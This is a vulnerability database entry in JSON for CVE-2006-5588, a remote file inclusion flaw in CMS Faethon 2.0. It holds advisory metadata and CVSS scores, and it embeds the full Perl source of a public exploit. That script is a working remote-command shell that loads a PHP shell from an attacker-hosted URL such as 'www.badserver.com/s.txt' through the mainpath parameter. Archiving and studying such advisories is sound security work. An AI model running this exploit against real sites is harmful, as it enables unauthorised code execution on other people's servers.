ID OSVDB:34265
Type osvdb
Reporter OSVDB
Modified 2006-10-24T20:56:24
Description
No description provided by the source
References:
Vendor Specific News/Changelog Entry: http://dev.cmsfaethon.org/tracker/?do=details&id=43
Vendor Specific News/Changelog Entry: http://cmsfaethon.org/news.php#8
Related OSVDB ID: 34264
ISS X-Force ID: 29757
Generic Exploit URL: http://milw0rm.com/exploits/2632
CVE-2006-5588
Bugtraq ID: 20705
{"bulletinFamily": "software", "viewCount": 0, "reporter": "OSVDB", "references": [], "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://dev.cmsfaethon.org/tracker/?do=details&id=43\nVendor Specific News/Changelog Entry: http://cmsfaethon.org/news.php#8\n[Related OSVDB ID: 34264](https://vulners.com/osvdb/OSVDB:34264)\nISS X-Force ID: 29757\nGeneric Exploit URL: http://milw0rm.com/exploits/2632\n[CVE-2006-5588](https://vulners.com/cve/CVE-2006-5588)\nBugtraq ID: 20705\n", "affectedSoftware": [], "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "8085b66eec39ba9eb8ad541aa92b6828"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "4d2535fdd621a69674c4309bc83d7e87"}, {"key": "href", "hash": "377a5adcec248126c57ba576f6b161aa"}, {"key": "modified", "hash": "f8ffd8a054813c85997f59acd5024922"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "f8ffd8a054813c85997f59acd5024922"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "955b328dc7cd615c13af5464c9183464"}, {"key": "title", "hash": "d779cea98016474b376aaba91326ab24"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "href": "https://vulners.com/osvdb/OSVDB:34265", "modified": "2006-10-24T20:56:24", "objectVersion": "1.2", "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2017-04-28T13:20:30"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-5588"]}, {"type": "osvdb", "idList": ["OSVDB:34264"]}, {"type": "exploitdb", "idList": ["EDB-ID:2632"]}], "modified": "2017-04-28T13:20:30"}, "vulnersScore": 7.3}, "id": "OSVDB:34265", "title": "CMS Faethon admin/config.php mainpath Multiple Remote File Inclusion", "hash": "b62ffcafd8e147716faee74c79c969dbbc9c9511a5af86064fc1c2bd5c6f1ee2", "edition": 1, "published": "2006-10-24T20:56:24", "type": "osvdb", "history": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "cvelist": ["CVE-2006-5588"], "lastseen": "2017-04-28T13:20:30"}
{"cve": [{"lastseen": "2019-05-29T18:08:34", "bulletinFamily": "NVD", "description": "Multiple PHP remote file inclusion vulnerabilities in CMS Faethon 2.0 Ultimate and earlier, when register_globals and magic_quotes_gpc are enabled, allow remote attackers to execute arbitrary PHP code via a URL in the mainpath parameter to (1) includes/rss-reader.php or (2) admin/config.php, different vectors than CVE-2006-3185.", "modified": "2017-10-19T01:29:00", "id": "CVE-2006-5588", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5588", "published": "2006-10-27T18:07:00", "title": "CVE-2006-5588", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://dev.cmsfaethon.org/tracker/?do=details&id=43\nVendor Specific News/Changelog Entry: http://cmsfaethon.org/news.php#8\n[Related OSVDB ID: 34265](https://vulners.com/osvdb/OSVDB:34265)\nISS X-Force ID: 29757\nGeneric Exploit URL: http://milw0rm.com/exploits/2632\n[CVE-2006-5588](https://vulners.com/cve/CVE-2006-5588)\nBugtraq ID: 20705\n", "modified": "2006-10-24T20:56:24", "published": "2006-10-24T20:56:24", "href": "https://vulners.com/osvdb/OSVDB:34264", "id": "OSVDB:34264", "title": "CMS Faethon includes/rss-reader.php mainpath Multiple Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T16:42:07", "bulletinFamily": "exploit", "description": "CMS Faethon <= 2.0 (mainpath) Remote File Include Exploit. CVE-2006-5588. Webapps exploit for php platform", "modified": "2006-10-24T00:00:00", "published": "2006-10-24T00:00:00", "id": "EDB-ID:2632", "href": "https://www.exploit-db.com/exploits/2632/", "type": "exploitdb", "title": "CMS Faethon <= 2.0 mainpath Remote File Include Exploit", "sourceData": "#!/usr/bin/perl\n\n#####################################################################################################\n# #\n# CMS Faethon 2.0 Ultimate #\n# #\n# Class: Remote/Local File Include Vulnerability #\n# #\n# Date: 2006/10/24 #\n# #\n# Remote: Yes #\n# #\n# Type: Highly critical #\n# #\n# Vendor: www.cmsfaethon.org \t #\n# #\n# Download: http://cmsfaethon.org/downloads/ \t #\n# #\n# Note: Successful exploitation requires register_globals = on and magic_quotes_gpc = on #\n# #\n# Discovered & Exploit by: r0ut3r (writ3r [at] gmail.com) #\n# #\n# Exploit: cmsfaethon2_xpl.pl #\n# #\n# Vulnerable code config.php #\n# require($mainpath . '../config.php'); #\n# #\n# Vulnerable code rss-reader.php #\n# if(isset($_GET['rss'])) { $source = $_GET['rss']; } #\n# #\n# // include lastRSS #\n# include($mainpath.'lib/class.lastrss.php'); #\n# include($mainpath.'lib/functions_AutoCzech.php'); #\n# #\n# Comments: #\n# Whats happenin tgo. #\n# Good lookin out with that last exploit too str0ke #\n# #\n#####################################################################################################\n\nuse LWP::UserAgent;\nuse LWP::Simple\n\n$target = @ARGV[0];\n$shellsite = @ARGV[1];\n$shellcmd = @ARGV[2];\n$fileno = @ARGV[3];\n\nif(!$target || !$shellsite)\n{\n usage();\n}\n\nheader();\n\nif ($fileno eq 1)\n{\n $file = \"/admin/config.php?mainpath=\";\n}\nelsif ($fileno eq 2)\n{\n $file = \"/includes/rss-reader.php?mainpath=\";\n}\nelse\n{\n $file = \"/admin/config.php?mainpath=\";\n}\n\nif (@ARGV[5] eq \"-p\")\n {\n print q\n {\n########################################################################\n Apply the following code to both files below:\n1: admin/config.php\n2: includes/rss-reader.php\n\nif(basename(__FILE__) == basename($_SERVER['PHP_SELF']))\n die();\n\nNOTE: Patch hasn't been tested, but it should work. The code denies\ndirect access to the files it is applied to.\n########################################################################\n }\n }\n\nprint \"Type 'exit' to quit\";\nprint \"[cmd]\\$\";\n$cmd = <STDIN>;\n\nwhile ($cmd !~ \"exit\")\n{\n $xpl = LWP::UserAgent->new() or die;\n $req =\nHTTP::Request->new(GET=>$target.$file.$shellsite.'?&'$shellcmd.'='.$cmd)\nor die(\"\\n\\n Failed to connect.\");\n $res = $xpl->request($req);\n $r = $res->content;\n $r =~ tr/[\\n]/[ê]/;\n\n if (@ARGV[4] eq \"-r\")\n {\n print $r;\n }\n\n print \"[cmd]\\$\";\n $cmd = <STDIN>;\n}\n\nsub header()\n{\n print q\n {\n########################################################################\n CMS Faethon 2.0 Ultimate - Remote File Include Exploit\n Vulnerability discovered and exploit by r0ut3r\n writ3r [at] gmail.com\n For CMS Faethon administrator testing purposes only!\n########################################################################\n };\n}\n\nsub usage()\n{\n header();\n print q\n {\n########################################################################\nUsage:\nperl cmsfaethon2_xpl.pl <Target website> <Shell Location> <CMD Variable> <f> <-r> <-p>\n<Target Website> - Path to target eg: www.faethon.target.com\n<Shell Location> - Path to shell eg: www.badserver.com/s.txt\n<CMD Variable> - Shell command variable name eg: cmd\n<f> - Vulnerable file number, corresponding to:\n1: config.php\n2: rss-reader.php\n<r> - Show output from shell\n<p> - Display patch\nExample:\nperl cmsfaethon2_xpl.pl http://localhost http://localhost/s.txt cmd 1 -r -p\n########################################################################\n };\n exit();\n}\n\n# milw0rm.com [2006-10-24]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2632/"}]}